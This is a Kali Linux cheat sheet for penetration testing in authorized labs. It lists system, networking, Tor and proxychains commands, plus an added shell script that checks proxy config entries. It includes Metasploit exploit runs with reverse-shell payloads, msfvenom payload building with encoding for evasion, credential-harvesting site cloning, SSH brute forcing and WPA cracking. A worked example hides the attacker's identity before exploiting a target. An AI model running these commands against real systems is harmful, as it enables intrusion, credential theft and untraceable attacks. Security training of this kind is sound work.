Kali Linux Cheat Sheet: Essential Commands for Penetration Testing
Introduction
Kali Linux is a Debian-based distribution tailored for cybersecurity
professionals, offering a robust platform for penetration testing,
vulnerability scanning, and digital forensics. This cheat sheet compiles
essential commands for system management, networking, anonymization, and
popular Kali tools, designed for quick reference. Aimed at intermediate
users, it assumes familiarity with Linux and networking basics. Use these
commands ethically in authorized lab environments (e.g., TryHackMe, Hack The
Box, Web Security Academy). Unauthorized use is illegal and unethical.
This cheat sheet complements the prior tutorials (e.g., Metasploit, msfvenom,
SEToolkit, Nessus) and includes commands for repository updates, MAC address
changing, IP hiding, and proxy setup.
General System Commands
Manage the Kali Linux system efficiently.
- Check System Info:
uname -a # Kernel and system details
Output: Linux kali 6.8.0-kali3-amd64 #1 SMP Debian 6.8.12-1kali1 (2025-08-15) x86_64 GNU/Linux
- Update System:
sudo apt update # Refresh package lists
sudo apt full-upgrade -y # Upgrade all packages
sudo apt autoremove -y # Remove unused packages
sudo apt autoclean # Clean cached packages
- Manage Services:
systemctl start <service> # Start a service (e.g., apache2)
systemctl enable <service> # Enable service at boot
systemctl status <service> # Check service status
systemctl stop <service> # Stop a service
- File System Navigation:
ls -la # List files with details
cd /path/to/directory # Change directory
pwd # Print working directory
mkdir <dir> # Create directory
touch <file> # Create empty file
cp <source> <dest> # Copy files
mv <source> <dest> # Move/rename files
rm -rf <file/dir> # Delete files/directories
- Edit Files:
nano <file> # Edit with nano
vim <file> # Edit with vim
cat <file> # Display file contents
- Check Processes:
ps aux # List all processes
top # Interactive process viewer
kill <pid> # Terminate process by ID
- System Reboot/Shutdown:
reboot # Reboot system
shutdown now # Power off
Repository Management
Keep Kali’s tools and system updated.
- Edit Repository Sources:
sudo nano /etc/apt/sources.list
Add:
deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware
- Update and Upgrade:
sudo apt update
sudo apt full-upgrade -y
- Fix Broken Packages:
sudo apt --fix-broken install
Networking Commands
Manage and analyze network configurations.
- Check Network Interfaces:
ip a # Show interfaces and IPs
Output: 2: eth0: <UP> mtu 1500 inet 192.168.1.100/24
- Ping a Host:
ping 192.168.1.10 # Test connectivity
- Network Scanning:
nmap -sV 192.168.1.10 # Service version scan
nmap -p 1-65535 192.168.1.10 # Full port scan
nmap -A 192.168.1.10 # Aggressive scan (OS, services)
- Start HTTP Server:
python3 -m http.server 8000 # Serve files on port 8000
- Check Open Ports:
netstat -tuln # List listening ports
Anonymization Techniques
Protect your identity during ethical testing.
MAC Address Changing
Spoof MAC addresses to avoid tracking.
- Check Current MAC:
macchanger -s eth0
Output: Current MAC: 00:11:22:33:44:55
- Change MAC Address:
sudo ifconfig eth0 down
sudo macchanger -r eth0 # Random MAC
sudo macchanger -m 00:aa:bb:cc:dd:ee eth0 # Specific MAC
sudo ifconfig eth0 up
IP Hiding with Tor
Route traffic through Tor for anonymity.
- Install Tor:
sudo apt install tor -y
- Start Tor Service:
sudo systemctl start tor
sudo systemctl enable tor
- Verify Tor IP:
torify curl ifconfig.me
Output: 198.51.100.123 (Tor exit node IP)
- Route Commands via Tor:
torify nmap -sT 192.168.1.10
Proxy Setup with Proxychains
Route traffic through proxies.
- Install Proxychains:
sudo apt install proxychains -y
- Configure Proxychains:
sudo nano /etc/proxychains4.conf
Add:
# Tor
socks5 127.0.0.1 9050
# Or external proxy: http <proxy_ip> 8080
- Use Proxychains:
proxychains nmap -sT 192.168.1.10
Output: |S-chain|-<>-127.0.0.1:9050-<>-192.168.1.10:80-<>-OK
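A typo in a proxy entry is easier to catch before anything is routed through the chain. The script below is an added example, not part of the original cheat sheet or of the proxychains project; it assumes entries in the `type host port` form shown above with IPv4 literals, and its function names and sample config are constructed for illustration.

```shell
# Added example: lint the [ProxyList] entries of a proxychains-style config.
# valid_ipv4, valid_port, lint_proxylist, write_sample are names made up here.

valid_ipv4() {   # succeed only for a dotted quad with every octet in 0..255
    case "$1" in *[!0-9.]* | *..* | .* | *.) return 1 ;; esac
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}
valid_port() {   # succeed only for a decimal port in 1..65535
    case "$1" in "" | *[!0-9]* | ??????*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}
# Print "line N: problem" for each bad entry in file $1; return 1 if any.
lint_proxylist() {
    file=$1 in_list=0 lineno=0 bad=0
    while IFS= read -r line || [ -n "$line" ]; do
        lineno=$((lineno + 1))
        set -f; set -- $line; set +f     # split fields without globbing
        [ "$#" -eq 0 ] && continue
        case "$1" in
            "#"*)          continue ;;               # comment line
            "[ProxyList]") in_list=1; continue ;;    # entries start here
        esac
        [ "$in_list" -eq 1 ] || continue             # skip global options
        problem=
        case "$1" in
            http | socks4 | socks5 | raw) ;;
            *) problem="unknown proxy type '$1'" ;;
        esac
        if [ -n "$problem" ]; then :
        elif ! valid_ipv4 "${2:-}"; then problem="bad IPv4 address '${2:-}'"
        elif ! valid_port "${3:-}"; then problem="bad port '${3:-}'"
        fi
        [ -z "$problem" ] || { echo "line $lineno: $problem"; bad=$((bad + 1)); }
    done < "$file"
    [ "$bad" -eq 0 ]
}
# Constructed sample config: one good entry followed by three bad ones.
write_sample() {
    printf '%s\n' 'strict_chain' '[ProxyList]' '# Tor' 'socks5 127.0.0.1 9050' \
        'http 192.0.2.456 8080' 'socks5 10.0.0.5 99999' 'sock5 127.0.0.1 1080' > "$1"
}
sample=$(mktemp) && write_sample "$sample"
lint_proxylist "$sample" || echo "fix the entries above before using this chain"
rm -f "$sample"
```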
Penetration Testing Tools
Commands for common Kali tools.
Nmap (Network Scanning)
- Basic Scan:
nmap 192.168.1.10
- Service Detection:
nmap -sV 192.168.1.10
- OS Detection:
nmap -O 192.168.1.10
- Aggressive Scan:
nmap -A 192.168.1.10
Metasploit Framework
- Start Metasploit:
msfconsole
- Search Exploits:
msf6 > search <keyword> # e.g., search windows/smb
- Use Exploit:
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.10
msf6 exploit(windows/smb/ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.1.100
msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
- Meterpreter Commands:
meterpreter > sysinfo
meterpreter > screenshot
meterpreter > hashdump
meterpreter > shell
msfvenom (Payload Generation)
- Generate Windows Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
- Encode Payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe
- Android Payload:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f apk -o android_shell.apk
Social-Engineering Toolkit (SET)
- Start SET:
sudo setoolkit
- Credential Harvesting:
# Select: 1) Social-Engineering Attacks > 2) Website Attack Vectors > 3) Credential Harvester > 2) Site Cloner
# Set IP: 192.168.1.100
# Set URL: http://192.168.1.10/wordpress/wp-login.php
Nessus (Vulnerability Scanning)
- Install Nessus:
sudo dpkg -i Nessus-<version>-debian6_amd64.deb
- Start Nessus:
sudo systemctl start nessusd
- Update Plugins:
sudo /opt/nessus/sbin/nessuscli update
- Access Web Interface:
https://localhost:8834
WPScan (WordPress Scanning)
- Install WPScan:
sudo apt install wpscan -y
- Scan WordPress:
wpscan --url http://192.168.1.10/wordpress --enumerate p,t,u
sqlmap (SQL Injection)
- Basic Scan:
sqlmap -u "http://192.168.1.10/index.php?id=1"
- Dump Database:
sqlmap -u "http://192.168.1.10/index.php?id=1" --dbs # --dbs lists the database names
Nikto (Web Scanning)
- Scan Website:
nikto -h http://192.168.1.10
Burp Suite (Web Testing)
- Start Burp Suite:
burpsuite
- Set Proxy:
Configure browser to use 127.0.0.1:8080
Aircrack-ng (Wireless Attacks)
- Monitor Mode:
sudo airmon-ng start wlan0
- Capture Packets:
sudo airodump-ng wlan0mon
- Crack WPA/WPA2:
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> capture.cap
Hydra (Password Cracking)
- Brute-Force SSH:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.10
John the Ripper (Password Cracking)
- Crack Hashes:
john hashes.txt
Practical Example: Scanning and Exploiting a Lab Target
Target: Metasploitable3 (192.168.1.10) with a vulnerable WordPress site.
- Anonymize:
sudo ifconfig eth0 down
sudo macchanger -r eth0
sudo ifconfig eth0 up
sudo systemctl start tor
proxychains curl ifconfig.me
- Scan with Nmap:
proxychains nmap -sV 192.168.1.10
- Scan WordPress with WPScan:
proxychains wpscan --url http://192.168.1.10/wordpress --enumerate p,t,u
- Exploit with Metasploit:
msfconsole
msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.10
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress/wp-admin/
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PASSWORD password123
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PAYLOAD cmd/unix/reverse_python
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.100
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 4444
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set Proxies socks5:127.0.0.1:9050
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
Best Practices and Tips
- Ethics and Legality: Obtain explicit permission; test only in lab
  environments (e.g., TryHackMe, Hack The Box). Unauthorized actions violate
  laws like the CFAA.
- Lab Setup: Use VMs (Metasploitable3, Docker) or cloud labs.
- Anonymity: Combine MAC spoofing, Tor, and Proxychains, but test
  in labs to avoid legal risks.
- Updates: Regularly update Kali (apt full-upgrade) and tools
  (e.g., msfupdate, wpscan --update).
- Integration: Use with Metasploit, msfvenom, SEToolkit, Nessus, and
  others for comprehensive testing (see prior tutorials).
- Common Pitfalls:
  - Avoid running Kali as a primary OS; use VMs.
  - Test proxies/Tor connectivity before scans.
- Resources:
  - Official Docs: https://www.kali.org/docs/
  - TryHackMe: “Kali Linux Basics” and “Penetration Testing” rooms
  - Hack The Box: “Metasploitable” and “Legacy” machines
  - Web Security Academy: https://portswigger.net/web-security
  - Offensive Security: https://www.offensive-security.com/kali-linux/
Visual References
Visuals include terminal outputs and tool interfaces. For screenshots:
- Kali Website: https://www.kali.org (terminal and desktop).
- TryHackMe: “Kali Linux” room shows command outputs.
- Medium Articles: Search “Kali Linux cheat sheet” (e.g.,
  https://medium.com/@securitygeek/kali-linux-commands).
- Offensive Security Blog: https://www.offensive-security.com/kali-linux/ for
  tool screenshots.
Conclusion
This Kali Linux cheat sheet provides a concise reference for essential commands,
enabling efficient penetration testing. Use it alongside tools like Metasploit,
Nessus, and SEToolkit in ethical, authorized lab environments to master
cybersecurity skills.
Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.kali.org